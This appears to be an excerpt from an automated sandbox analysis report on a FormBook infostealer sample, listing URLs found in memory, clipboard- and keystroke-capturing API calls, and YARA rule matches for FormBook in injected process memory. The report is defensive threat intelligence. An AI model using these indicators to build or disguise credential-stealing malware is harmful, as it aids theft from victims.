              Source: explorer.exe, 00000011.00000000.1639216371.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000011.00000003.2284256993.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
              Source: explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
              Source: explorer.exe, 00000011.00000000.1641297778.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
              Source: explorer.exe, 00000011.00000000.1641297778.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
              Source: explorer.exe, 00000011.00000000.1641297778.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000011.00000002.2628883555.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
              Source: explorer.exe, 00000011.00000000.1641297778.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
              Source: explorer.exe, 00000011.00000000.1641297778.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2644044750.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
              Source: explorer.exe, 00000011.00000002.2633886761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2286255088.0000000006F31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1637421697.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_005AF45C
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_005AF6C7
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_005AF45C
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,8_2_0059A54A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005C9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_005C9ED5

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
